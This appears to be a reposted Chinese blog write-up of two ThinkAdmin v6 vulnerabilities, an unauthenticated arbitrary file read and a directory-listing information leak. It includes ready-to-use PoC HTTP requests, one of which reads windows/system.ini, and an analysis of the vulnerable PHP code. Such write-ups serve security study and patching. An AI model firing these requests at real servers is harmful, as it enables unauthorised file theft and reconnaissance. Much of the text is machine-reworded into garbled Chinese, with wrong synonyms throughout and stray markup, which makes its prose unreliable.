ThinkAdmin_v6两个简朴漏洞(文件读取+信息泄露)

侵权声明
本文章中的全部内容（包括但不限于文字、图像和其他媒体）仅供教育和参考目的。如果在本文章中利用了任何受版权保护的材料，我们满怀敬意地承认该内容的版权归原作者全部。
如果您是版权持有人，并且认为您的作品被侵犯，请通过以下方式与我们接洽： [360619623@qq.com]。我们将在确认后的合理时间内接纳得当步伐，包括删除相关内容。
感谢您的理解与支持

POC


文件读取

1. //我读的是windows/system.ini
2. GET /public/index.php?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b1b3b2x322s333b371b373d37382t311a2x322x HTTP/1.1
3. Host: demo.com
4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
5. Accept: */*
6. Accept-Encoding: gzip, deflate, br
7. Accept-Language: zh-CN,zh;q=0.9
8. Connection: keep-alive

复制代码

读取文件的路径必要编码

1. [/code]
2. [size=5]信息泄露[/size]
4. [code]POST /public/index.php?s=admin/api.Update/node HTTP/1.1
5. Host: demo.com
6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
7. Accept: */*
8. Accept-Encoding: gzip, deflate, br
9. Accept-Language: zh-CN,zh;q=0.9
10. Connection: keep-alive
11. Content-Type: application/x-www-form-urlencoded
12. Content-Length: 22
14. rules=%5B%22.%2F%22%5D

复制代码

漏洞分析


文件读取

输入进来的encode用input吸收的，更进input()函数

没有过滤，执行了一条语句就退出了

继续更进decode()函数，是一个解密函数，刚好上面就是加密函数

getRootPath()函数是获取网址根目次的绝度路径，最终的读取的文件路径即为网址根目次加输入进来的路径
'content' => base64_encode(file_get_contents($file))最终路径的文件内容读出并进行base64编码，所以如果想看到文件真正的文件内容必要解码一下。

信息泄露

json_decode($this->request->post('rules', '[]', ''), true)将名为rules的参数通过post方法吸收然后通过json_decode方法将内容转换成关联数组。效果就是'["./"]' -> ["./"]
之后更进getList()函数

此中$name = strtr(trim($rule, '\\/'), '\\', '/');作用是首先会去除 $rule 字符串两端的任何反斜杠和正斜杠，然后再将字符串中的全部反斜杠更换为正斜杠。最终，结果将会赋值给 $name。
跟进scanList()函数

可以看到是先判断路径是否存在，之后判断是否为目次。之后的大概意思是判断是否为文件，如果是就保存到data中然后进行下一次递归调用即该路径的子目次。直到遍历完该路径下的所以文件和目次。

漏洞复现


文件读取

信息泄露

总结

题目有两点，一没有权限校验，二没有对输入的数据做过滤和查抄

修复

跟着官方走，官方更新你就更新。这是最简朴的。

参考

CVE-2020-25540：ThinkAdmin两个漏洞复现-腾讯云开发者社区-腾讯云 (tencent.com)
免责声明
本博客所提供的技能知识和信息仅旨在教育和分享网络安全最佳实践，促进网络安全意识的提升。作者严禁将这些技能和信息用于任何非法或不道德的目的。
利用本博客内容而导致的任何违法行为或结果，作者不承担任何法律责任。全部读者在利用本博客的信息时，应自行承担风险，并确保遵守当地法律法规。
我们鼓励全部读者合法地利用所提供的信息和技能，致力于维护安全和负责任的网络情况。
感谢您的理解与支持。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。